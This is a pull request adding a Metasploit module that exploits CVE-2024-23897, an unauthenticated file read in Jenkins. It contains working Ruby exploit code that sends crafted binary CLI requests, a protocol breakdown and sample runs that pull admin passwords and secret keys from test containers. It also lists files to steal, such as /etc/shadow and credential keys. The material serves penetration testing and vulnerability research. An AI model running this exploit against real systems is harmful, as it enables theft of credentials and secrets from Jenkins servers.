### PR TITLE
initial POC for jenkins CVE-2024-23897 (unauth arbitrary file read)

### DIFF
--- a/documentation/modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.md
+++ b/documentation/modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.md
@@ -59,7 +59,7 @@ LTS Version 2.426.2: `docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:2.4
 
 1. Install the application
 1. Start msfconsole
-1. Do: `use auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read`
+1. Do: `use auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read`
 1. Do: `set rhost [ip]`
 1. Do: `run`
 1. You should get the first two lines of the `FILE_PATH`
@@ -99,12 +99,12 @@ Locality to use for reading the file. This may mangle binary files. Defaults to 
 ### jenkins 2.440-jdk17 on Docker
 
 ```
-msf6 > use auxiliary/gather/auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read
-msf6 auxiliary(gather/auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read) > set rhost 127.0.0.1
+msf6 > use auxiliary/gather/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read
+msf6 auxiliary(gather/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read) > set rhost 127.0.0.1
 rhost => 127.0.0.1
-msf6 auxiliary(gather/auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read) > set file_path /var/jenkins_home/secrets/initialAdminPassword
+msf6 auxiliary(gather/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read) > set file_path /var/jenkins_home/secrets/initialAdminPassword
 file_path => /var/jenkins_home/secrets/initialAdminPassword
-msf6 auxiliary(gather/auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read) > run
+msf6 auxiliary(gather/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read) > run
 [*] Running module against 127.0.0.1
 
 [*] Sending requests with UUID: ed148f4d-709a-4d16-a452-4509f3a37ed6
@@ -118,12 +118,12 @@ f5d5f6e98e1f466aad22c0f81ca48fb0
 ### jenkins 2.426.2-lts on Docker
 
 ```
-msf6 > use auxiliary/gather/auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read
-msf6 auxiliary(gather/auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read) > set rhost 127.0.0.1
+msf6 > use auxiliary/gather/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read
+msf6 auxiliary(gather/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read) > set rhost 127.0.0.1
 rhost => 127.0.0.1
-msf6 auxiliary(gather/auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read) > set file_path /var/jenkins_home/secret.key
+msf6 auxiliary(gather/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read) > set file_path /var/jenkins_home/secret.key
 file_path => /var/jenkins_home/secret.key
-msf6 auxiliary(gather/auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read) > run
+msf6 auxiliary(gather/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read) > run
 [*] Running module against 127.0.0.1
 
 [*] Sending requests with UUID: 0d69c3f1-7695-4db1-a0c6-08108f33e339

--- a/documentation/modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.md
+++ b/documentation/modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.md
@@ -1,0 +1,104 @@
+## Vulnerable Application
+
+Exploitation by hand can be done by downloading the CLI from the target: `wget http://<host>:8080/jnlpJars/jenkins-cli.jar`
+
+Vulnerable versions include:
+
+ * < 2.442
+ * LTS < 2.426.3
+
+### Protocol Breakdown
+
+A few samples of the protocol that was observed, how to generate it, and the breakdown of fields.
+ 
+|                                           | **Generator**                                                                    | **Heading**                  | **Pad (1)**      | **Unknown (len(@file_name) + 2)** | **len(@file_name)** | **@** | **file_name**            | **Unknown**  | **len(encoding)** | **UTF-8**  | **Unknown**  | **len(locality)** | **en_US**  | **footer** |
+|-------------------------------------------|----------------------------------------------------------------------------------|------------------------------|------------------|-------------|---------------------|-------|--------------------------|--------------|-------------------|------------|--------------|-------------------|------------|------------|
+| **no pad multi line file (/tmp/file.22)** | java -jar jenkins-cli.jar -s http://localhost:8080/ -http help "@/tmp/test.22"   | 0000000600000468656c70000000 |                  | 0f0000      | 0d                  | 40    | 2f746d702f746573742e3232 | 000000070200 | 05                | 5554462d38 | 000000070100 | 05                | 656e5f5553 | 0000000003 |
+| **no pad single line file (/tmp/file.1)** | java -jar jenkins-cli.jar -s http://localhost:8080/ -http help "@/tmp/test.1"    | 0000000600000468656c70000000 |                  | 0e0000      | 0c                  | 40    | 2f746d702f746573742e31   | 000000070200 | 05                | 5554462d38 | 000000070100 | 05                | 656e5f5553 | 0000000003 |
+| **pad multi line file (/tmp/file.22)**    | java -jar jenkins-cli.jar -s http://localhost:8080/ -http help 1 "@/tmp/test.22" | 0000000600000468656c70000000 | 0300000131000000 | 0f0000      | 0d                  | 40    | 2f746d702f746573742e3232 | 000000070200 | 05                | 5554462d38 | 000000070100 | 05                | 656e5f5553 | 0000000003 |
+| **pad single line file (/tmp/file.1)**    | java -jar jenkins-cli.jar -s http://localhost:8080/ -http help 1 "@/tmp/test.1"  | 0000000600000468656c70000000 | 0300000131000000 | 0e0000      | 0c                  | 40    | 2f746d702f746573742e31   | 000000070200 | 05                | 5554462d38 | 000000070100 | 05                | 656e5f5553 | 0000000003 |
+
+### Docker Setup
+
+Version 2.440: `docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:2.440-jdk17`
+
+LTS Version 2.426.2: `docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:2.426.2-lts`
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read`
+1. Do: `set rhost [ip]`
+1. Do: `run`
+1. You should get the first two lines of the `FILE_PATH`
+
+## Options
+
+### FILE_PATH
+
+File path to read from the server. Defaults to `/etc/passwd`.
+
+Other files which may be of value:
+ * `/var/jenkins_home/secret.key`
+ * `/var/jenkins_home/secrets/master.key`
+ * `/var/jenkins_home/secrets/initialAdminPassword`
+ * `/etc/passwd`
+ * `/etc/shadow`
+ * Project secrets and credentials
+ * Source code, build artifacts
+
+### DELAY
+
+Delay between first and second request to ensure first request gets there on time, but the second request is very quickly behind it.
+Defaults to `0.5`
+
+Testing against the docker image showed values between `.01` and `1.9` were successful.
+
+### ENCODING
+
+Encoding to use for reading the file. This may mangle binary files. Defaults to `UTF-8`
+
+### LOCALITY
+
+Locality to use for reading the file. This may mangle binary files. Defaults to `en_US`
+
+## Scenarios
+
+### jenkins 2.440-jdk17 on Docker
+
+```
+msf6 > use auxiliary/gather/auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read
+msf6 auxiliary(gather/auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf6 auxiliary(gather/auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read) > set file_path /var/jenkins_home/secrets/initialAdminPassword
+file_path => /var/jenkins_home/secrets/initialAdminPassword
+msf6 auxiliary(gather/auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read) > run
+[*] Running module against 127.0.0.1
+
+[*] Sending requests with UUID: ed148f4d-709a-4d16-a452-4509f3a37ed6
+[*] Re-attempting with padding for single line output file
+[+] /var/jenkins_home/secrets/initialAdminPassword file contents retrieved (first line or 2):
+f5d5f6e98e1f466aad22c0f81ca48fb0
+[+] Results saved to: /root/.msf4/loot/20240130204021_default_127.0.0.1_jenkins.file_717110.txt
+[*] Auxiliary module execution completed
+```
+
+### jenkins 2.426.2-lts on Docker
+
+```
+msf6 > use auxiliary/gather/auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read
+msf6 auxiliary(gather/auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read) > set rhost 127.0.0.1
+rhost => 127.0.0.1
+msf6 auxiliary(gather/auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read) > set file_path /var/jenkins_home/secret.key
+file_path => /var/jenkins_home/secret.key
+msf6 auxiliary(gather/auxiliary/gather/jenkins_ccli_ampersand_arbitrary_file_read) > run
+[*] Running module against 127.0.0.1
+
+[*] Sending requests with UUID: 0d69c3f1-7695-4db1-a0c6-08108f33e339
+[*] Re-attempting with padding for single line output file
+[+] /var/jenkins_home/secret.key file contents retrieved (first line or 2):
+6ce26592ad3683cc8d056bea07ffa2696f1b14f0db64dbd122c50ab930e279ad
+[+] Results saved to: /root/.msf4/loot/20240130204241_default_127.0.0.1_jenkins.file_317409.txt
+[*] Auxiliary module execution completed
+```

--- a/lib/msf/core/exploit/remote/http/jenkins.rb
+++ b/lib/msf/core/exploit/remote/http/jenkins.rb
@@ -6,7 +6,6 @@ module Msf
       module HTTP
         # This module provides a way of logging into Jenkins
         module Jenkins
-
           # Returns the Jenkins version.
           #
           # @return [String] Jenkins version.
@@ -27,7 +26,6 @@ module Msf
             version = version_attribute ? version_attribute.value : ''
             version.scan(/jenkins-([\d.]+)/).flatten.first
           end
-
 
           # This method takes a target URI and makes a request to verify if logging in is possible,
           # otherwise it will fail gracefully

--- a/lib/msf/core/exploit/remote/http/jenkins.rb
+++ b/lib/msf/core/exploit/remote/http/jenkins.rb
@@ -15,7 +15,7 @@ module Msf
             res = send_request_cgi({ 'uri' => uri })
 
             unless res
-              fail_with(Failure::Unknown, 'Connection timed out while finding the Jenkins version')
+              return nil 
             end
 
             # shortcut for new versions such as 2.426.2 and 2.440

--- a/lib/msf/core/exploit/remote/http/jenkins.rb
+++ b/lib/msf/core/exploit/remote/http/jenkins.rb
@@ -6,6 +6,29 @@ module Msf
       module HTTP
         # This module provides a way of logging into Jenkins
         module Jenkins
+
+          # Returns the Jenkins version.
+          #
+          # @return [String] Jenkins version.
+          # @return [NilClass] No Jenkins version found.
+          def jenkins_version
+            uri = normalize_uri(target_uri.path)
+            res = send_request_cgi({ 'uri' => uri })
+
+            unless res
+              fail_with(Failure::Unknown, 'Connection timed out while finding the Jenkins version')
+            end
+
+            # shortcut for new versions such as 2.426.2 and 2.440
+            return res.headers['X-Jenkins'] if res.headers['X-Jenkins']
+
+            html = res.get_html_document
+            version_attribute = html.at('body').attributes['data-version']
+            version = version_attribute ? version_attribute.value : ''
+            version.scan(/jenkins-([\d.]+)/).flatten.first
+          end
+
+
           # This method takes a target URI and makes a request to verify if logging in is possible,
           # otherwise it will fail gracefully
           #

--- a/modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb
+++ b/modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb
@@ -6,6 +6,8 @@
 class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Report
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Jenkins
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -128,7 +130,7 @@ class MetasploitModule < Msf::Auxiliary
     "\x03\x00\x00\x01\x31\x00\x00\x00"
   end
 
-  def data_generator(pad: false)
+  def data_generator(pad =  false)
     data = []
     data << request_header
     data << parameter_one if pad
@@ -141,7 +143,7 @@ class MetasploitModule < Msf::Auxiliary
     data.join('')
   end
 
-  def upload_request(uuid, multi_line_file: true)
+  def upload_request(uuid, multi_line_file = true)
     # send upload request asking for file
 
     # In testing against Docker image on localhost, .01 seems to be the magic to get the download request to hit very slightly ahead of the upload request
@@ -231,7 +233,7 @@ class MetasploitModule < Msf::Auxiliary
     # Looking over the python PoCs, they all include threading however
     # the writeup, and PoCs don't mention a timing component.
     # However, during testing it was found that the two requests need to
-    # his the server nearly simultaneously, with the 'download' one hitting
+    # hit the server nearly simultaneously, with the 'download' one hitting
     # first. During testing, even a .1 second slowdown was too much and
     # the server resulted in a 500 error. So we need to thread these to
     # execute them fast enough that the server gets both in rapid succession

--- a/modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb
+++ b/modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb
@@ -130,7 +130,7 @@ class MetasploitModule < Msf::Auxiliary
     "\x03\x00\x00\x01\x31\x00\x00\x00"
   end
 
-  def data_generator(pad =  false)
+  def data_generator(pad: false)
     data = []
     data << request_header
     data << parameter_one if pad
@@ -143,7 +143,7 @@ class MetasploitModule < Msf::Auxiliary
     data.join('')
   end
 
-  def upload_request(uuid, multi_line_file = true)
+  def upload_request(uuid, multi_line_file: true)
     # send upload request asking for file
 
     # In testing against Docker image on localhost, .01 seems to be the magic to get the download request to hit very slightly ahead of the upload request
@@ -161,7 +161,7 @@ class MetasploitModule < Msf::Auxiliary
       'vars_get' => {
         'remoting' => 'false'
       },
-      'data' => data_generator(multi_line_file)
+      'data' => data_generator(pad: multi_line_file)
     )
 
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
@@ -241,7 +241,7 @@ class MetasploitModule < Msf::Auxiliary
     use_pad = false
     threads = []
     threads << framework.threads.spawn('CVE-2024-23897', false) do
-      upload_request(uuid, use_pad) # try single line file first since we get an error if we have more content to get
+      upload_request(uuid, multi_line_file: use_pad) # try single line file first since we get an error if we have more content to get
     end
     threads << framework.threads.spawn('CVE-2024-23897', false) do
       download_request(uuid)
@@ -259,7 +259,7 @@ class MetasploitModule < Msf::Auxiliary
       use_pad = true
       threads = []
       threads << framework.threads.spawn('CVE-2024-23897-upload', false) do
-        upload_request(uuid, use_pad)
+        upload_request(uuid, multi_line_file: use_pad)
       end
       threads << framework.threads.spawn('CVE-2024-23897-download', false) do
         download_request(uuid)

--- a/modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb
+++ b/modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb
@@ -149,7 +149,7 @@ class MetasploitModule < Msf::Auxiliary
     "\x03\x00\x00\x01\x31\x00\x00\x00"
   end
 
-  def data_generator(pad = false)
+  def data_generator(pad: false)
     data = []
     data << request_header
     data << parameter_one if pad == true
@@ -162,7 +162,7 @@ class MetasploitModule < Msf::Auxiliary
     data.join('')
   end
 
-  def upload_request(uuid, multi_line_file = true)
+  def upload_request(uuid, multi_line_file: true)
     # send upload request asking for file
 
     # In testing against Docker image on localhost, .01 seems to be the magic to get the download request to hit very slightly ahead of the upload request

--- a/modules/auxiliary/gather/jenkins_cli_connect_arbitrary_file_read.rb
+++ b/modules/auxiliary/gather/jenkins_cli_connect_arbitrary_file_read.rb
@@ -1,0 +1,188 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        # The Name should be just like the line of a Git commit - software name,
+        # vuln type, class. Preferably apply
+        # some search optimization so people can actually find the module.
+        # We encourage consistency between module name and file name.
+        'Name' => 'Sample Webapp Exploit',
+        'Description' => %q{
+          docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:2.440-jdk17
+        },
+        'License' => MSF_LICENSE,
+        # The place to add your name/handle and email.  Twitter and other contact info isn't handled here.
+        # Add reference to additional authors, like those creating original proof of concepts or
+        # reference materials.
+        # It is also common to comment in who did what (PoC vs metasploit module, etc)
+        'Author' => [
+          'h00die', # msf module
+          'Yaniv Nizry' # discovery
+        ],
+        'References' => [
+          [ 'URL', 'https://www.jenkins.io/security/advisory/2024-01-24/'],
+          [ 'URL', 'https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/'],
+          [ 'URL', 'https://github.com/binganao/CVE-2024-23897'],
+          [ 'URL', 'https://github.com/h4x0r-dz/CVE-2024-23897'],
+          [ 'URL', 'https://github.com/Vozec/CVE-2024-23897'],
+          [ 'CVE', '2024-23897']
+        ],
+        # from lib/msf/core/module/privileged, denotes if this requires or gives privileged access
+        'Privileged' => false,
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DisclosureDate' => '2024-01-24',
+        # Note that DefaultTarget refers to the index of an item in Targets, rather than name.
+        # It's generally easiest just to put the default at the beginning of the list and skip this
+        # entirely.
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ ],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        },
+        'DefaultOptions' => {
+          'RPORT' => 8080
+        }
+      )
+    )
+    # set the default port, and a URI that a user can set if the app isn't installed to the root
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path for Jenkins', '/']),
+        OptString.new('FILE_PATH', [true, 'File path to read from the server', '/etc/passwd']),
+      ]
+    )
+  end
+
+  # Returns the Jenkins version. taken from jenkins_cred_recovery.rb
+  #
+  # @return [String] Jenkins version.
+  # @return [NilClass] No Jenkins version found.
+  def get_jenkins_version
+    uri = normalize_uri(target_uri.path)
+    res = send_request_cgi({ 'uri' => uri })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out while finding the Jenkins version')
+    end
+
+    html = res.get_html_document
+    version_attribute = html.at('body').attributes['data-version']
+    version = version_attribute ? version_attribute.value : ''
+    version.scan(/jenkins-([\d.]+)/).flatten.first
+  end
+
+  # Returns a check code indicating the vulnerable status. taken from jenkins_cred_recovery.rb
+  #
+  # @return [Array] Check code
+  def check
+    version = get_jenkins_version
+    vprint_status("Found version: #{version}")
+
+    # Default version is vulnerable, but can be mitigated by refusing anonymous permission on
+    # decryption API. So a version wouldn't be adequate to check.
+    if version
+      return Exploit::CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def upload_request(uuid)
+    # send upload request asking for file
+    Rex::ThreadSafe.sleep(0.01) # this sleep seems to be the magic to get the download request to hit very slightly ahead of the upload request
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'cli'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'ctype' => 'application/octet-stream',
+      'headers' => {
+        'Session' => uuid,
+        'Side' => 'upload'
+        # "Content-type": "application/octet-stream"
+      },
+      'vars_get' => {
+        'remoting' => 'false'
+      },
+      # https://github.com/h4x0r-dz/CVE-2024-23897/blob/main/CVE-2024-23897.py#L45C13-L45C187
+      'data' => "\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@#{datastore['FILE_PATH']}\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03"
+    )
+
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid server reply to upload request (response code: #{res.code})") unless res.code == 200
+    # we don't get a response here, so we just need the request to go through and 200 us
+  end
+
+  def process_result
+    file_contents = []
+    @content_body.split("\n").each do |html_response_line|
+      # filter for the two lines which have output
+      if html_response_line.include? 'ERROR: Too many arguments'
+        file_contents << html_response_line.gsub('ERROR: Too many arguments: ', '').strip
+      elsif html_response_line.include? 'COMMAND : Name of the command (default:'
+        temp = html_response_line.gsub(' COMMAND : Name of the command (default: ', '')
+        temp = temp.chomp(')').strip
+        file_contents.insert(0, temp)
+      end
+    end
+    return if file_contents.empty?
+
+    print_good("#{datastore['FILE_PATH']} file contents:\n#{file_contents.join("\n")}")
+  end
+
+  def download_request(uuid)
+    # send download request
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'cli'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'headers' => {
+        'Session' => uuid,
+        'Side' => 'download'
+      },
+      'vars_get' => {
+        'remoting' => 'false'
+      }
+    )
+
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to web service - no response") if res.nil?
+    fail_with(Failure::UnexpectedReply, "#{peer} - Invalid server reply to download request (response code: #{res.code})") unless res.code == 200
+
+    @content_body = res.body
+  end
+
+  def run
+    uuid = SecureRandom.uuid
+
+    print_status("Sending requests with UUID: #{uuid}")
+    threads = []
+    threads << framework.threads.spawn('CVE-2024-23897', false) do
+      upload_request(uuid)
+    end
+    threads << framework.threads.spawn('CVE-2024-23897', false) do
+      download_request(uuid)
+    end
+
+    threads.map do |t|
+      t.join
+    rescue StandardError
+      nil
+    end
+    if @content_body
+      process_result
+    else
+      print_bad('Exploit failed, no exploit data was successfully returned')
+    end
+  end
+end


### PR DESCRIPTION
This PR adds a new module to exploit CVE-2024-23897 , an unauth arbitrary (first 2 lines) file read on Jenkins.

All of the python PoCs I reviewed (all linked in module) aren't very good. While they work for `/etc/passwd`, they only pull files w/ multiple lines and only with a file name length of 11 since the string length is hardcoded. I know its too late, but shoutout to @acammack-r7 back on https://github.com/rapid7/metasploit-framework/pull/13741#pullrequestreview-443307224 for opening my eyes to this kind of thing.

This PoC works with files that have 1 line, or multiple lines, adds check and error handling, so I believe its good to go now.

- [ ]  Install the application
- [ ]  Start msfconsole
- [ ]  Do: `use auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read`
- [ ]  Do: `set rhost [ip]`
- [ ]  Do: `run`
- [ ]  You should get the first two lines of the `FILE_PATH`